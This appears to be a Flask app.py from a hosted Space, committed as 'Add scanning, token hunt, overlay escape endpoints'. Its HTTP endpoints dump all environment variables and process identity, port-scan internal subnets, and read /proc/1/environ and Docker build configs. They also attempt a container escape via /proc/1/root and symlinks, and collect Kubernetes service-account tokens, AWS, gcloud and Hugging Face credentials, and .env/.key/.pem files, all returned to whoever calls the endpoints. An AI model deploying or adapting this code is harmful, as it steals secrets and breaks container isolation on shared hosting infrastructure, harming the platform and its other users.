env-test-s19 / app.py
testtest123's picture
Add scanning, token hunt, overlay escape endpoints
c37bfd9
import os
import subprocess
import json
import urllib.request
import socket
import ssl
import concurrent.futures
from flask import Flask, Response, request
app = Flask(__name__)
@app.route("/")
def index():
results = {
"env_vars": dict(os.environ),
"id": subprocess.check_output(["id"], timeout=5).decode().strip(),
}
return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')
@app.route("/probe")
def probe():
target = request.args.get("target", "10.108.144.112")
port = int(request.args.get("port", "7860"))
path = request.args.get("path", "/")
results = {}
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
result = s.connect_ex((target, port))
results["tcp"] = f"{'open' if result == 0 else 'closed'} (code={result})"
s.close()
except Exception as e:
results["tcp"] = str(e)
try:
resp = urllib.request.urlopen(f"http://{target}:{port}{path}", timeout=3)
results["http"] = {"status": resp.status, "body": resp.read().decode()[:3000], "headers": dict(resp.headers)}
except Exception as e:
results["http"] = str(e)
return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')
@app.route("/scan")
def scan():
"""Scan a subnet for open ports"""
base = request.args.get("base", "10.108.73")
port = int(request.args.get("port", "7860"))
start = int(request.args.get("start", "1"))
end = int(request.args.get("end", "20"))
results = {}
def check_host(ip):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
result = s.connect_ex((ip, port))
s.close()
if result == 0:
return (ip, "open")
return None
except:
return None
with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:
futures = {}
for i in range(start, min(end + 1, start + 50)):
ip = f"{base}.{i}"
futures[executor.submit(check_host, ip)] = ip
for future in concurrent.futures.as_completed(futures, timeout=10):
result = future.result()
if result:
results[result[0]] = result[1]
return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')
@app.route("/build-arg-test")
def build_arg_test():
"""Check if any build args leaked into the image"""
results = {}
# Check Docker history / image metadata
try:
# Check /proc/1/environ for the main process
with open("/proc/1/environ", "rb") as f:
env_bytes = f.read()
envs = env_bytes.split(b'\x00')
results["proc_1_environ"] = [e.decode('utf-8', errors='replace') for e in envs if e]
except Exception as e:
results["proc_1_environ"] = str(e)
# Check if there are any leftover files from build
interesting_paths = [
"/kaniko", "/workspace", "/.dockerconfigjson", "/root/.docker/config.json",
"/tmp/build", "/buildkit", "/.buildkit_qemu_emulator",
"/etc/buildkit", "/root/.cache"
]
results["build_artifacts"] = {}
for p in interesting_paths:
if os.path.exists(p):
if os.path.isdir(p):
try:
results["build_artifacts"][p] = os.listdir(p)
except:
results["build_artifacts"][p] = "exists but unreadable"
else:
try:
with open(p) as f:
results["build_artifacts"][p] = f.read()[:500]
except:
results["build_artifacts"][p] = "exists but unreadable"
return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')
@app.route("/overlay-escape")
def overlay_escape():
"""Test if we can access the host overlay filesystem"""
results = {}
# The overlay mount shows:
# upperdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/XXXX/fs
# This path is on the HOST filesystem, but we can only see it via overlay
# Try reading /proc/1/root which should loop back to our own root
try:
results["proc_1_root_etc_hostname"] = open("/proc/1/root/etc/hostname").read()
except Exception as e:
results["proc_1_root_etc_hostname"] = str(e)
# Check if we can access /proc/1/root/../ to escape
try:
results["proc_1_root_parent"] = os.listdir("/proc/1/root/../")
except Exception as e:
results["proc_1_root_parent"] = str(e)
# Try symlink tricks
try:
os.symlink("/proc/1/root", "/tmp/escape_link")
results["symlink_escape"] = os.listdir("/tmp/escape_link/")
except Exception as e:
results["symlink_escape"] = str(e)
# Try accessing other containerd snapshots
try:
results["containerd_snapshots"] = os.listdir("/var/lib/containerd/")
except Exception as e:
results["containerd_snapshots"] = str(e)
return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')
@app.route("/token-hunt")
def token_hunt():
"""Search for any tokens/credentials in the filesystem"""
results = {}
# Check well-known token locations
token_paths = [
"/var/run/secrets/kubernetes.io/serviceaccount/token",
"/var/run/secrets/kubernetes.io/serviceaccount/ca.crt",
"/var/run/secrets/kubernetes.io/serviceaccount/namespace",
"/root/.kube/config",
"/root/.docker/config.json",
"/root/.aws/credentials",
"/root/.gcloud/credentials",
"/home/user/.cache/huggingface/token",
"/root/.cache/huggingface/token",
"/root/.huggingface/token",
]
for p in token_paths:
try:
if os.path.isfile(p):
with open(p) as f:
results[p] = f.read()[:500]
elif os.path.isdir(p):
results[p] = os.listdir(p)
else:
results[p] = "not found"
except Exception as e:
results[p] = str(e)
# Search for any .env files
for root_dir in ["/", "/app", "/home", "/root", "/tmp"]:
try:
for dirpath, dirnames, filenames in os.walk(root_dir, topdown=True):
dirnames[:] = dirnames[:10] # Limit depth
for f in filenames:
if f.endswith(('.env', '.token', '.key', '.pem', 'credentials')):
full = os.path.join(dirpath, f)
try:
with open(full) as fh:
results[full] = fh.read()[:200]
except:
pass
break # Only first level
except:
pass
return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')
if __name__ == "__main__":
app.run(host="0.0.0.0", port=7860)